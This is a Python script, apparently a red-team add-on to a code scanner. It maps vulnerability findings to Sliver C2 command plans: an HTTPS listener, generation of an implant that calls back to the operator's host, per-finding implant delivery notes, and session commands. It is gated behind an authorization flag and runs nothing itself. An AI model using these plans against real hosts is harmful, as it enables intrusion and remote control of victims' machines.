#!/usr/bin/env python3
"""Sliver bridge -- turn Attestor findings into a Sliver operator command plan.

House contract (offensive lane -- read this):
- GENERATOR ONLY. Writes Sliver console command TEMPLATES (listener setup,
  implant `generate`) to a text file. Never starts a listener, never generates a
  real implant, never connects to anything. The operator reviews and runs each
  command in the Sliver console themselves.
- The operator supplies the TARGET explicitly. Gated behind --yes-authorized.
- Windows implants by default (--os linux/macos also available).
- Not wired into the default `attestor` CLI.

Workflow:
  1. Start the Sliver server yourself: sliver-server_windows-amd64.exe
  2. attestor confirm <code> --json > findings.json
  3. python detector/sliver_bridge.py --findings findings.json \
         --target <authorized-host> --lhost <your-ip> --yes-authorized \
         --out plan.txt
  4. Open the Sliver console and run each command from plan.txt yourself,
     reviewing before you execute.
"""
from __future__ import annotations

import argparse
import json
import os
import sys
from dataclasses import dataclass, field

BANNER = "  [Sliver Bridge] Generates a Sliver C2 plan for AUTHORIZED targets only.\n"

# finding class / CWE -> what delivery category applies
SLIVER_MAP: dict[str, dict] = {
    "command_injection": {
        "cwe": "CWE-78",
        "note": "Command injection gives you an execution primitive that can be "
                "used to fetch and run a Sliver implant on the target.",
    },
    "code_injection": {
        "cwe": "CWE-94",
        "note": "Server-side code injection / SSTI gives an execution primitive "
                "for implant delivery.",
    },
    "deserialization": {
        "cwe": "CWE-502",
        "note": "Insecure deserialization can be used as an execution primitive "
                "for implant delivery via a gadget chain.",
    },
    "file_upload": {
        "cwe": "CWE-434",
        "note": "Unrestricted upload lets you place the generated implant binary "
                "directly on the target, then trigger it via the application.",
    },
    "sql_injection": {
        "cwe": "CWE-89",
        "note": "SQLi with a stacked-query / command-execution feature (engine "
                "dependent) can serve as an execution primitive.",
    },
}
_CWE_TO_CLASS = {v["cwe"]: k for k, v in SLIVER_MAP.items()}


@dataclass
class Plan:
    target: str
    lhost: str
    lport: str
    os: str
    findings: list[dict] = field(default_factory=list)
    matched: list[dict] = field(default_factory=list)


def _classify(finding: dict) -> tuple[str, dict] | None:
    kind = (finding.get("sink_type") or finding.get("category")
            or finding.get("vulnerability") or "").lower().replace("-", "_")
    if kind in SLIVER_MAP:
        return kind, SLIVER_MAP[kind]
    cwe = finding.get("cwe") or finding.get("sink_cwe") or ""
    if cwe in _CWE_TO_CLASS:
        k = _CWE_TO_CLASS[cwe]
        return k, SLIVER_MAP[k]
    return None


def build_plan(findings: list[dict], target: str, lhost: str, lport: str,
              os_target: str = "windows") -> Plan:
    plan = Plan(target=target, lhost=lhost, lport=lport, os=os_target, findings=findings)
    for f in findings:
        c = _classify(f)
        if c:
            plan.matched.append({"finding": f, "class": c[0], "map": c[1]})
    return plan


def generate_console_script(plan: Plan) -> str:
    L = [
        "# ============================================================",
        "# Sliver operator command plan -- generated by Attestor sliver_bridge",
        "# AUTHORIZED TESTING ONLY. Review and run each line yourself in the",
        "# Sliver console; nothing here executes automatically.",
        f"# Target: {plan.target}    LHOST: {plan.lhost}  LPORT: {plan.lport}  "
        f"OS: {plan.os}",
        "# ============================================================",
        "",
        "# 1) start a listener (pick a profile: mtls / https / dns / wg)",
        f"https --lhost {plan.lhost} --lport {plan.lport}",
        "",
        "# 2) generate an implant for the target OS",
        f"generate --http {plan.lhost} --os {plan.os} --save ./implant",
        "",
        "# 3) list active listeners / implants",
        "jobs",
        "implants",
        "",
    ]
    if not plan.matched:
        L.append("# (no findings mapped to a delivery primitive -- generate/deliver")
        L.append("#  manually appropriate to your access)")
    else:
        L.append("# --- delivery notes, per confirmed finding ---")
        for i, m in enumerate(plan.matched, 1):
            f = m["finding"]
            mp = m["map"]
            loc = f"{f.get('sink_file', f.get('file',''))}:{f.get('sink_line', f.get('line',''))}"
            L += [
                f"# finding {i}: {m['class']} ({mp['cwe']}) at {loc}",
                f"#   {mp['note']}",
                "#   -> deliver the implant generated above through this primitive,",
                "#      using your own judgment for the target's environment.",
                "",
            ]
    L += [
        "# 4) once a session lands:",
        "sessions",
        "use <session-id>",
        "info",
    ]
    return "\n".join(L)


def render(plan: Plan, script: str) -> str:
    out = [BANNER,
           f"  Mapped {len(plan.matched)}/{len(plan.findings)} finding(s) to a "
           f"delivery primitive.",
           "  " + "=" * 58, "", "  --- Sliver console command plan ---", script]
    out += ["", "  Paste into the `sliver >` console yourself, one section at a time."]
    return "\n".join(out)


def _load_findings(args) -> list[dict]:
    if args.findings:
        with open(args.findings, encoding="utf-8") as f:
            data = json.load(f)
        return data if isinstance(data, list) else data.get("results", data.get("findings", []))
    if args.scan:
        _here = os.path.dirname(os.path.abspath(__file__))
        if _here not in sys.path:
            sys.path.insert(0, _here)
        import dataflow, confirm
        confs = confirm.confirm_paths([args.scan])
        confirmed = [confirm.to_dict([c])[0] for c in confs if c.status == "CONFIRMED"]
        if confirmed:
            return confirmed
        return dataflow.to_dict(dataflow.scan_paths([args.scan]))
    return []


def main(argv=None) -> int:
    ap = argparse.ArgumentParser(
        prog="attestor-sliver-bridge",
        description="Generate a Sliver C2 command plan from Attestor findings "
                    "(authorized use only).",
        formatter_class=argparse.RawDescriptionHelpFormatter, epilog=__doc__)
    src = ap.add_mutually_exclusive_group(required=True)
    src.add_argument("--findings", help="JSON findings file (from attestor --json)")
    src.add_argument("--scan", help="scan a code path (dataflow+confirm) to derive findings")
    ap.add_argument("--target", default="", help="host you are authorized to test")
    ap.add_argument("--lhost", default="LHOST", help="your listener host/IP")
    ap.add_argument("--lport", default="443", help="your listener port")
    ap.add_argument("--os", default="windows", choices=["windows", "linux", "macos"])
    ap.add_argument("--out", "-o", help="write the plan to this file")
    ap.add_argument("--json", action="store_true")
    ap.add_argument("--yes-authorized", action="store_true",
                    help="confirm you are authorized to test the target")
    args = ap.parse_args(argv)

    if not args.yes_authorized:
        sys.stderr.write(BANNER)
        sys.stderr.write("  Refusing without --yes-authorized (attest you have permission).\n")
        return 2

    findings = _load_findings(args)
    plan = build_plan(findings, args.target, args.lhost, args.lport, args.os)
    script = generate_console_script(plan)

    if args.out:
        with open(args.out, "w", encoding="utf-8") as f:
            f.write(script + "\n")
        sys.stderr.write(f"  wrote {args.out}\n")

    if args.json:
        print(json.dumps({"target": plan.target, "os": plan.os,
                          "mapped": len(plan.matched), "total": len(plan.findings),
                          "plan": script}, indent=2))
    else:
        print(render(plan, script))
    return 0


if __name__ == "__main__":
    raise SystemExit(main())
